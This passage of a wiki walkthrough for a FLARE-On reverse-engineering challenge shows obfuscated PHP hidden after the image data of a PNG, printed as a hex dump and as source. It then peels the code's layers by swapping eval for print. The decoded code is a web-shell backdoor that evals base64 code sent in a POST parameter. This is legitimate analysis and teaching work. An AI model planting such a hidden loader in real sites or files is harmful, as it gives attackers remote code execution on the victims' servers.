The-FLARE-On-Challenge-01/Challenge-2

From aldeid
Jump to navigation Jump to search
You are here
Challenge 2

Uncompress the archive

You can get the file from following location: http://www.flare-on.com/files/C2.zip

Let's uncompress the archive (password is "malware"): 

$ 7z x C2.zip 

7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=fr_FR.utf8,Utf16=on,HugeFiles=on,4 CPUs)

Processing archive: C2.zip

Extracting  home.html
Enter password (will not be echoed) : malware

Extracting  img
Extracting  img/flare-on.png

Everything is Ok

Folders: 1
Files: 2
Size:       17935
Compressed: 10758

It results in 2 files as follows: 

.
├── home.html (MD5: d16db814c05dd9619fec6944aa4590da)
└── img
    └── flare-on.png (MD5: 45d147b3e6c573a608a5c2138f1f5e0d)

What does it look like?

When we open home.html in our browser, it looks like this:

Extract PHP code from the image

The HTML code itself (home.html) doesn't contain anything of interest but the image (img/flare-on.png) includes some PHP: 

$ hd flare-on.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 01 90 00 00 00 4f  08 06 00 00 00 c5 a0 93  |.......O........|
00000020  82 00 00 00 01 73 52 47  42 00 ae ce 1c e9 00 00  |.....sRGB.......|
00000030  00 04 67 41 4d 41 00 00  b1 8f 0b fc 61 05 00 00  |..gAMA......a...|
00000040  00 09 70 48 59 73 00 00  12 74 00 00 12 74 01 de  |..pHYs...t...t..|
00000050  66 1f 78 00 00 00 19 74  45 58 74 53 6f 66 74 77  |f.x....tEXtSoftw|
00000060  61 72 65 00 41 64 6f 62  65 20 49 6d 61 67 65 52  |are.Adobe ImageR|
00000070  65 61 64 79 71 c9 65 3c  00 00 19 34 49 44 41 54  |eadyq.e<...4IDAT|
00000080  78 5e ed 9d 07 78 15 45  d7 c7 87 1a 42 4b 02 a1  |x^...x.E....BK..|
00000090  77 50 29 36 40 45 a4 06  04 44 e9 0a 88 28 28 2a  |wP)[email protected]...((*|
000000a0  b1 d1 5e 3a 48 17 21 58  90 22 1f 12 15 51 51 5f  |..^:H.!X."...QQ_|
000000b0  5a 2c 28 82 f4 22 58 e8  45 6c 20 08 4a 10 e9 89  |Z,(.."X.El .J...|
[SNIP]
000019c0  ae 42 60 82 3c 3f 70 68  70 20 24 74 65 72 6d 73  |.B`.<?php $terms|
000019d0  3d 61 72 72 61 79 28 22  4d 22 2c 20 22 5a 22 2c  |=array("M", "Z",|
000019e0  20 22 5d 22 2c 20 22 70  22 2c 20 22 5c 5c 22 2c  | "]", "p", "\\",|
000019f0  20 22 77 22 2c 20 22 66  22 2c 20 22 31 22 2c 20  | "w", "f", "1", |
00001a00  22 76 22 2c 20 22 3c 22  2c 20 22 61 22 2c 20 22  |"v", "<", "a", "|
00001a10  51 22 2c 20 22 7a 22 2c  20 22 20 22 2c 20 22 73  |Q", "z", " ", "s|
00001a20  22 2c 20 22 6d 22 2c 20  22 2b 22 2c 20 22 45 22  |", "m", "+", "E"|
00001a30  2c 20 22 44 22 2c 20 22  67 22 2c 20 22 57 22 2c  |, "D", "g", "W",|
00001a40  20 22 5c 22 22 2c 20 22  71 22 2c 20 22 79 22 2c  | "\"", "q", "y",|
00001a50  20 22 54 22 2c 20 22 56  22 2c 20 22 6e 22 2c 20  | "T", "V", "n", |
00001a60  22 53 22 2c 20 22 58 22  2c 20 22 29 22 2c 20 22  |"S", "X", ")", "|
00001a70  39 22 2c 20 22 43 22 2c  20 22 50 22 2c 20 22 72  |9", "C", "P", "r|
00001a80  22 2c 20 22 26 22 2c 20  22 5c 27 22 2c 20 22 21  |", "&", "\'", "!|
00001a90  22 2c 20 22 78 22 2c 20  22 47 22 2c 20 22 3a 22  |", "x", "G", ":"|
00001aa0  2c 20 22 32 22 2c 20 22  7e 22 2c 20 22 4f 22 2c  |, "2", "~", "O",|
00001ab0  20 22 68 22 2c 20 22 75  22 2c 20 22 55 22 2c 20  | "h", "u", "U", |
00001ac0  22 40 22 2c 20 22 3b 22  2c 20 22 48 22 2c 20 22  |"@", ";", "H", "|
00001ad0  33 22 2c 20 22 46 22 2c  20 22 36 22 2c 20 22 62  |3", "F", "6", "b|
00001ae0  22 2c 20 22 4c 22 2c 20  22 3e 22 2c 20 22 5e 22  |", "L", ">", "^"|
00001af0  2c 20 22 2c 22 2c 20 22  2e 22 2c 20 22 6c 22 2c  |, ",", ".", "l",|
00001b00  20 22 24 22 2c 20 22 64  22 2c 20 22 60 22 2c 20  | "$", "d", "`", |
00001b10  22 25 22 2c 20 22 4e 22  2c 20 22 2a 22 2c 20 22  |"%", "N", "*", "|
00001b20  5b 22 2c 20 22 30 22 2c  20 22 7d 22 2c 20 22 4a  |[", "0", "}", "J|
00001b30  22 2c 20 22 2d 22 2c 20  22 35 22 2c 20 22 5f 22  |", "-", "5", "_"|
00001b40  2c 20 22 41 22 2c 20 22  3d 22 2c 20 22 7b 22 2c  |, "A", "=", "{",|
00001b50  20 22 6b 22 2c 20 22 6f  22 2c 20 22 37 22 2c 20  | "k", "o", "7", |
00001b60  22 23 22 2c 20 22 69 22  2c 20 22 49 22 2c 20 22  |"#", "i", "I", "|
00001b70  59 22 2c 20 22 28 22 2c  20 22 6a 22 2c 20 22 2f  |Y", "(", "j", "/|
00001b80  22 2c 20 22 3f 22 2c 20  22 4b 22 2c 20 22 63 22  |", "?", "K", "c"|
00001b90  2c 20 22 42 22 2c 20 22  74 22 2c 20 22 52 22 2c  |, "B", "t", "R",|
00001ba0  20 22 34 22 2c 20 22 38  22 2c 20 22 65 22 2c 20  | "4", "8", "e", |
00001bb0  22 7c 22 29 3b 24 6f 72  64 65 72 3d 61 72 72 61  |"|");$order=arra|
00001bc0  79 28 35 39 2c 20 37 31  2c 20 37 33 2c 20 31 33  |y(59, 71, 73, 13|
00001bd0  2c 20 33 35 2c 20 31 30  2c 20 32 30 2c 20 38 31  |, 35, 10, 20, 81|
00001be0  2c 20 37 36 2c 20 31 30  2c 20 32 38 2c 20 36 33  |, 76, 10, 28, 63|
00001bf0  2c 20 31 32 2c 20 31 2c  20 32 38 2c 20 31 31 2c  |, 12, 1, 28, 11,|
00001c00  20 37 36 2c 20 36 38 2c  20 35 30 2c 20 33 30 2c  | 76, 68, 50, 30,|
00001c10  20 31 31 2c 20 32 34 2c  20 37 2c 20 36 33 2c 20  | 11, 24, 7, 63, |
00001c20  34 35 2c 20 32 30 2c 20  32 33 2c 20 36 38 2c 20  |45, 20, 23, 68, |
00001c30  38 37 2c 20 34 32 2c 20  32 34 2c 20 36 30 2c 20  |87, 42, 24, 60, |
00001c40  38 37 2c 20 36 33 2c 20  31 38 2c 20 35 38 2c 20  |87, 63, 18, 58, |
*
00001c60  38 37 2c 20 36 33 2c 20  38 33 2c 20 34 33 2c 20  |87, 63, 83, 43, |
00001c70  38 37 2c 20 39 33 2c 20  31 38 2c 20 39 30 2c 20  |87, 93, 18, 90, |
00001c80  33 38 2c 20 32 38 2c 20  31 38 2c 20 31 39 2c 20  |38, 28, 18, 19, |
00001c90  36 36 2c 20 32 38 2c 20  31 38 2c 20 31 37 2c 20  |66, 28, 18, 17, |
00001ca0  33 37 2c 20 36 33 2c 20  35 38 2c 20 33 37 2c 20  |37, 63, 58, 37, |
00001cb0  39 31 2c 20 36 33 2c 20  38 33 2c 20 34 33 2c 20  |91, 63, 83, 43, |
00001cc0  38 37 2c 20 34 32 2c 20  32 34 2c 20 36 30 2c 20  |87, 42, 24, 60, |
00001cd0  38 37 2c 20 39 33 2c 20  31 38 2c 20 38 37 2c 20  |87, 93, 18, 87, |
00001ce0  36 36 2c 20 32 38 2c 20  34 38 2c 20 31 39 2c 20  |66, 28, 48, 19, |
00001cf0  36 36 2c 20 36 33 2c 20  35 30 2c 20 33 37 2c 20  |66, 63, 50, 37, |
00001d00  39 31 2c 20 36 33 2c 20  31 37 2c 20 31 2c 20 38  |91, 63, 17, 1, 8|
00001d10  37 2c 20 39 33 2c 20 31  38 2c 20 34 35 2c 20 36  |7, 93, 18, 45, 6|
00001d20  36 2c 20 32 38 2c 20 34  38 2c 20 31 39 2c 20 34  |6, 28, 48, 19, 4|
00001d30  30 2c 20 31 31 2c 20 32  35 2c 20 35 2c 20 37 30  |0, 11, 25, 5, 70|
00001d40  2c 20 36 33 2c 20 37 2c  20 33 37 2c 20 39 31 2c  |, 63, 7, 37, 91,|
00001d50  20 36 33 2c 20 31 32 2c  20 31 2c 20 38 37 2c 20  | 63, 12, 1, 87, |
00001d60  39 33 2c 20 31 38 2c 20  38 31 2c 20 33 37 2c 20  |93, 18, 81, 37, |
00001d70  32 38 2c 20 34 38 2c 20  31 39 2c 20 31 32 2c 20  |28, 48, 19, 12, |
00001d80  36 33 2c 20 32 35 2c 20  33 37 2c 20 39 31 2c 20  |63, 25, 37, 91, |
00001d90  36 33 2c 20 38 33 2c 20  36 33 2c 20 38 37 2c 20  |63, 83, 63, 87, |
00001da0  39 33 2c 20 31 38 2c 20  38 37 2c 20 32 33 2c 20  |93, 18, 87, 23, |
00001db0  32 38 2c 20 31 38 2c 20  37 35 2c 20 34 39 2c 20  |28, 18, 75, 49, |
00001dc0  32 38 2c 20 34 38 2c 20  31 39 2c 20 34 39 2c 20  |28, 48, 19, 49, |
00001dd0  30 2c 20 35 30 2c 20 33  37 2c 20 39 31 2c 20 36  |0, 50, 37, 91, 6|
00001de0  33 2c 20 31 38 2c 20 35  30 2c 20 38 37 2c 20 34  |3, 18, 50, 87, 4|
00001df0  32 2c 20 31 38 2c 20 39  30 2c 20 38 37 2c 20 39  |2, 18, 90, 87, 9|
00001e00  33 2c 20 31 38 2c 20 38  31 2c 20 34 30 2c 20 32  |3, 18, 81, 40, 2|
00001e10  38 2c 20 34 38 2c 20 31  39 2c 20 34 30 2c 20 31  |8, 48, 19, 40, 1|
00001e20  31 2c 20 37 2c 20 35 2c  20 37 30 2c 20 36 33 2c  |1, 7, 5, 70, 63,|
00001e30  20 37 2c 20 33 37 2c 20  39 31 2c 20 36 33 2c 20  | 7, 37, 91, 63, |
00001e40  31 32 2c 20 36 38 2c 20  38 37 2c 20 39 33 2c 20  |12, 68, 87, 93, |
00001e50  31 38 2c 20 38 31 2c 20  37 2c 20 32 38 2c 20 34  |18, 81, 7, 28, 4|
00001e60  38 2c 20 31 39 2c 20 36  36 2c 20 36 33 2c 20 35  |8, 19, 66, 63, 5|
00001e70  30 2c 20 35 2c 20 34 30  2c 20 36 33 2c 20 32 35  |0, 5, 40, 63, 25|
00001e80  2c 20 33 37 2c 20 39 31  2c 20 36 33 2c 20 32 34  |, 37, 91, 63, 24|
00001e90  2c 20 36 33 2c 20 38 37  2c 20 36 33 2c 20 31 32  |, 63, 87, 63, 12|
00001ea0  2c 20 36 38 2c 20 38 37  2c 20 30 2c 20 32 34 2c  |, 68, 87, 0, 24,|
00001eb0  20 31 37 2c 20 33 37 2c  20 32 38 2c 20 31 38 2c  | 17, 37, 28, 18,|
00001ec0  20 31 37 2c 20 33 37 2c  20 30 2c 20 35 30 2c 20  | 17, 37, 0, 50, |
00001ed0  35 2c 20 34 30 2c 20 34  32 2c 20 35 30 2c 20 35  |5, 40, 42, 50, 5|
00001ee0  2c 20 34 39 2c 20 34 32  2c 20 32 35 2c 20 35 2c  |, 49, 42, 25, 5,|
00001ef0  20 39 31 2c 20 36 33 2c  20 35 30 2c 20 35 2c 20  | 91, 63, 50, 5, |
00001f00  37 30 2c 20 34 32 2c 20  32 35 2c 20 33 37 2c 20  |70, 42, 25, 37, |
00001f10  39 31 2c 20 36 33 2c 20  37 35 2c 20 31 2c 20 38  |91, 63, 75, 1, 8|
00001f20  37 2c 20 39 33 2c 20 31  38 2c 20 31 2c 20 31 37  |7, 93, 18, 1, 17|
00001f30  2c 20 38 30 2c 20 35 38  2c 20 36 36 2c 20 33 2c  |, 80, 58, 66, 3,|
00001f40  20 38 36 2c 20 32 37 2c  20 38 38 2c 20 37 37 2c  | 86, 27, 88, 77,|
00001f50  20 38 30 2c 20 33 38 2c  20 32 35 2c 20 34 30 2c  | 80, 38, 25, 40,|
00001f60  20 38 31 2c 20 32 30 2c  20 35 2c 20 37 36 2c 20  | 81, 20, 5, 76, |
00001f70  38 31 2c 20 31 35 2c 20  35 30 2c 20 31 32 2c 20  |81, 15, 50, 12, |
00001f80  31 2c 20 32 34 2c 20 38  31 2c 20 36 36 2c 20 32  |1, 24, 81, 66, 2|
00001f90  38 2c 20 34 30 2c 20 39  30 2c 20 35 38 2c 20 38  |8, 40, 90, 58, 8|
00001fa0  31 2c 20 34 30 2c 20 33  30 2c 20 37 35 2c 20 31  |1, 40, 30, 75, 1|
00001fb0  2c 20 32 37 2c 20 31 39  2c 20 37 35 2c 20 32 38  |, 27, 19, 75, 28|
00001fc0  2c 20 37 2c 20 38 38 2c  20 33 32 2c 20 34 35 2c  |, 7, 88, 32, 45,|
00001fd0  20 37 2c 20 39 30 2c 20  35 32 2c 20 38 30 2c 20  | 7, 90, 52, 80, |
00001fe0  35 38 2c 20 35 2c 20 37  30 2c 20 36 33 2c 20 37  |58, 5, 70, 63, 7|
00001ff0  2c 20 35 2c 20 36 36 2c  20 34 32 2c 20 32 35 2c  |, 5, 66, 42, 25,|
00002000  20 33 37 2c 20 39 31 2c  20 30 2c 20 31 32 2c 20  | 37, 91, 0, 12, |
00002010  35 30 2c 20 38 37 2c 20  36 33 2c 20 38 33 2c 20  |50, 87, 63, 83, |
00002020  34 33 2c 20 38 37 2c 20  39 33 2c 20 31 38 2c 20  |43, 87, 93, 18, |
00002030  39 30 2c 20 33 38 2c 20  32 38 2c 20 34 38 2c 20  |90, 38, 28, 48, |
00002040  31 39 2c 20 37 2c 20 36  33 2c 20 35 30 2c 20 35  |19, 7, 63, 50, 5|
00002050  2c 20 33 37 2c 20 30 2c  20 32 34 2c 20 31 2c 20  |, 37, 0, 24, 1, |
00002060  38 37 2c 20 30 2c 20 32  34 2c 20 37 32 2c 20 36  |87, 0, 24, 72, 6|
00002070  36 2c 20 32 38 2c 20 34  38 2c 20 31 39 2c 20 34  |6, 28, 48, 19, 4|
00002080  30 2c 20 30 2c 20 32 35  2c 20 35 2c 20 33 37 2c  |0, 0, 25, 5, 37,|
00002090  20 30 2c 20 32 34 2c 20  31 2c 20 38 37 2c 20 39  | 0, 24, 1, 87, 9|
000020a0  33 2c 20 31 38 2c 20 31  31 2c 20 36 36 2c 20 32  |3, 18, 11, 66, 2|
000020b0  38 2c 20 31 38 2c 20 38  37 2c 20 37 30 2c 20 32  |8, 18, 87, 70, 2|
000020c0  38 2c 20 34 38 2c 20 31  39 2c 20 37 2c 20 36 33  |8, 48, 19, 7, 63|
000020d0  2c 20 35 30 2c 20 35 2c  20 33 37 2c 20 30 2c 20  |, 50, 5, 37, 0, |
000020e0  31 38 2c 20 31 2c 20 38  37 2c 20 34 32 2c 20 32  |18, 1, 87, 42, 2|
000020f0  34 2c 20 36 30 2c 20 38  37 2c 20 30 2c 20 32 34  |4, 60, 87, 0, 24|
00002100  2c 20 31 37 2c 20 39 31  2c 20 32 38 2c 20 31 38  |, 17, 91, 28, 18|
00002110  2c 20 37 35 2c 20 34 39  2c 20 32 38 2c 20 31 38  |, 75, 49, 28, 18|
00002120  2c 20 34 35 2c 20 31 32  2c 20 32 38 2c 20 34 38  |, 45, 12, 28, 48|
00002130  2c 20 31 39 2c 20 34 30  2c 20 30 2c 20 37 2c 20  |, 19, 40, 0, 7, |
00002140  35 2c 20 33 37 2c 20 30  2c 20 32 34 2c 20 39 30  |5, 37, 0, 24, 90|
00002150  2c 20 38 37 2c 20 39 33  2c 20 31 38 2c 20 38 31  |, 87, 93, 18, 81|
00002160  2c 20 33 37 2c 20 32 38  2c 20 34 38 2c 20 31 39  |, 37, 28, 48, 19|
00002170  2c 20 34 39 2c 20 30 2c  20 35 30 2c 20 35 2c 20  |, 49, 0, 50, 5, |
00002180  34 30 2c 20 36 33 2c 20  32 35 2c 20 35 2c 20 39  |40, 63, 25, 5, 9|
00002190  31 2c 20 36 33 2c 20 35  30 2c 20 35 2c 20 33 37  |1, 63, 50, 5, 37|
000021a0  2c 20 30 2c 20 31 38 2c  20 36 38 2c 20 38 37 2c  |, 0, 18, 68, 87,|
000021b0  20 39 33 2c 20 31 38 2c  20 31 2c 20 31 38 2c 20  | 93, 18, 1, 18, |
000021c0  32 38 2c 20 34 38 2c 20  31 39 2c 20 34 30 2c 20  |28, 48, 19, 40, |
000021d0  30 2c 20 32 35 2c 20 35  2c 20 33 37 2c 20 30 2c  |0, 25, 5, 37, 0,|
000021e0  20 32 34 2c 20 39 30 2c  20 38 37 2c 20 30 2c 20  | 24, 90, 87, 0, |
000021f0  32 34 2c 20 37 32 2c 20  33 37 2c 20 32 38 2c 20  |24, 72, 37, 28, |
00002200  34 38 2c 20 31 39 2c 20  36 36 2c 20 36 33 2c 20  |48, 19, 66, 63, |
00002210  35 30 2c 20 35 2c 20 34  30 2c 20 36 33 2c 20 32  |50, 5, 40, 63, 2|
00002220  35 2c 20 33 37 2c 20 39  31 2c 20 36 33 2c 20 32  |5, 37, 91, 63, 2|
00002230  34 2c 20 36 33 2c 20 38  37 2c 20 36 33 2c 20 31  |4, 63, 87, 63, 1|
00002240  32 2c 20 36 38 2c 20 38  37 2c 20 30 2c 20 32 34  |2, 68, 87, 0, 24|
00002250  2c 20 31 37 2c 20 33 37  2c 20 32 38 2c 20 34 38  |, 17, 37, 28, 48|
00002260  2c 20 31 39 2c 20 34 30  2c 20 39 30 2c 20 32 35  |, 19, 40, 90, 25|
00002270  2c 20 33 37 2c 20 39 31  2c 20 36 33 2c 20 31 38  |, 37, 91, 63, 18|
00002280  2c 20 39 30 2c 20 38 37  2c 20 39 33 2c 20 31 38  |, 90, 87, 93, 18|
00002290  2c 20 39 30 2c 20 33 38  2c 20 32 38 2c 20 31 38  |, 90, 38, 28, 18|
000022a0  2c 20 31 39 2c 20 36 36  2c 20 32 38 2c 20 31 38  |, 19, 66, 28, 18|
000022b0  2c 20 37 35 2c 20 37 30  2c 20 32 38 2c 20 34 38  |, 75, 70, 28, 48|
000022c0  2c 20 31 39 2c 20 34 30  2c 20 39 30 2c 20 35 38  |, 19, 40, 90, 58|
000022d0  2c 20 33 37 2c 20 39 31  2c 20 36 33 2c 20 37 35  |, 37, 91, 63, 75|
000022e0  2c 20 31 31 2c 20 37 39  2c 20 32 38 2c 20 32 37  |, 11, 79, 28, 27|
000022f0  2c 20 37 35 2c 20 33 2c  20 34 32 2c 20 32 33 2c  |, 75, 3, 42, 23,|
00002300  20 38 38 2c 20 33 30 2c  20 33 35 2c 20 34 37 2c  | 88, 30, 35, 47,|
00002310  20 35 39 2c 20 37 31 2c  20 37 31 2c 20 37 33 2c  | 59, 71, 71, 73,|
00002320  20 33 35 2c 20 36 38 2c  20 33 38 2c 20 36 33 2c  | 35, 68, 38, 63,|
00002330  20 38 2c 20 31 2c 20 33  38 2c 20 34 35 2c 20 33  | 8, 1, 38, 45, 3|
00002340  30 2c 20 38 31 2c 20 31  35 2c 20 35 30 2c 20 31  |0, 81, 15, 50, 1|
00002350  32 2c 20 31 2c 20 32 34  2c 20 38 31 2c 20 36 36  |2, 1, 24, 81, 66|
00002360  2c 20 32 38 2c 20 34 30  2c 20 39 30 2c 20 35 38  |, 28, 40, 90, 58|
00002370  2c 20 38 31 2c 20 34 30  2c 20 33 30 2c 20 37 35  |, 81, 40, 30, 75|
00002380  2c 20 31 2c 20 32 37 2c  20 31 39 2c 20 37 35 2c  |, 1, 27, 19, 75,|
00002390  20 32 38 2c 20 32 33 2c  20 37 35 2c 20 37 37 2c  | 28, 23, 75, 77,|
000023a0  20 31 2c 20 32 38 2c 20  31 2c 20 34 33 2c 20 35  | 1, 28, 1, 43, 5|
000023b0  32 2c 20 33 31 2c 20 31  39 2c 20 37 35 2c 20 38  |2, 31, 19, 75, 8|
000023c0  31 2c 20 34 30 2c 20 33  30 2c 20 37 35 2c 20 31  |1, 40, 30, 75, 1|
000023d0  2c 20 32 37 2c 20 37 35  2c 20 37 37 2c 20 33 35  |, 27, 75, 77, 35|
000023e0  2c 20 34 37 2c 20 35 39  2c 20 37 31 2c 20 37 31  |, 47, 59, 71, 71|
000023f0  2c 20 37 31 2c 20 37 33  2c 20 32 31 2c 20 34 2c  |, 71, 73, 21, 4,|
00002400  20 33 37 2c 20 35 31 2c  20 34 30 2c 20 34 2c 20  | 37, 51, 40, 4, |
00002410  37 2c 20 39 31 2c 20 37  2c 20 34 2c 20 33 37 2c  |7, 91, 7, 4, 37,|
00002420  20 37 37 2c 20 34 39 2c  20 34 2c 20 37 2c 20 39  | 77, 49, 4, 7, 9|
00002430  31 2c 20 37 30 2c 20 34  2c 20 33 37 2c 20 34 39  |1, 70, 4, 37, 49|
00002440  2c 20 35 31 2c 20 34 2c  20 35 31 2c 20 39 31 2c  |, 51, 4, 51, 91,|
00002450  20 34 2c 20 33 37 2c 20  37 30 2c 20 36 2c 20 34  | 4, 37, 70, 6, 4|
00002460  2c 20 37 2c 20 39 31 2c  20 39 31 2c 20 34 2c 20  |, 7, 91, 91, 4, |
00002470  33 37 2c 20 35 31 2c 20  37 30 2c 20 34 2c 20 37  |37, 51, 70, 4, 7|
00002480  2c 20 39 31 2c 20 34 39  2c 20 34 2c 20 33 37 2c  |, 91, 49, 4, 37,|
00002490  20 35 31 2c 20 36 2c 20  34 2c 20 37 2c 20 39 31  | 51, 6, 4, 7, 91|
000024a0  2c 20 39 31 2c 20 34 2c  20 33 37 2c 20 35 31 2c  |, 91, 4, 37, 51,|
000024b0  20 37 30 2c 20 32 31 2c  20 34 37 2c 20 39 33 2c  | 70, 21, 47, 93,|
000024c0  20 38 2c 20 31 30 2c 20  35 38 2c 20 38 32 2c 20  | 8, 10, 58, 82, |
000024d0  35 39 2c 20 37 31 2c 20  37 31 2c 20 37 31 2c 20  |59, 71, 71, 71, |
000024e0  38 32 2c 20 35 39 2c 20  37 31 2c 20 37 31 2c 20  |82, 59, 71, 71, |
000024f0  32 39 2c 20 32 39 2c 20  34 37 29 3b 24 64 6f 5f  |29, 29, 47);$do_|
00002500  6d 65 3d 22 22 3b 66 6f  72 28 24 69 3d 30 3b 24  |me="";for($i=0;$|
00002510  69 3c 63 6f 75 6e 74 28  24 6f 72 64 65 72 29 3b  |i<count($order);|
00002520  24 69 2b 2b 29 7b 24 64  6f 5f 6d 65 3d 24 64 6f  |$i++){$do_me=$do|
00002530  5f 6d 65 2e 24 74 65 72  6d 73 5b 24 6f 72 64 65  |_me.$terms[$orde|
00002540  72 5b 24 69 5d 5d 3b 7d  65 76 61 6c 28 24 64 6f  |r[$i]];}eval($do|
00002550  5f 6d 65 29 3b 20 3f 3e                           |_me); ?>|
00002558

Let's extract this PHP code: 

<?php
$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");

$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);

$do_me="";

for($i=0;
    $i<count($order);
    $i++){$do_me=$do_me.$terms[$order[$i]];
}

eval($do_me);
?>

First decoding stage (PHP)

Replace the "eval" instructions with a "print" to see the first stage of decoding and execute the code: 

$ php image-code.php

Here is what it outputs: 

$_= \'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';

$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';

$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";

eval($___($__));

Second decoding stage (PHP)

Once again, let's replace the "eval" instructions with "print" and execute the new produced script: 

$ cat image-code-2.php 
<?php
$_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';

$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';

$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";

print($___($__));
?>

$ php image-code-2.php 
$code=base64_decode($_);eval($code);

Third decoding stage (base64)

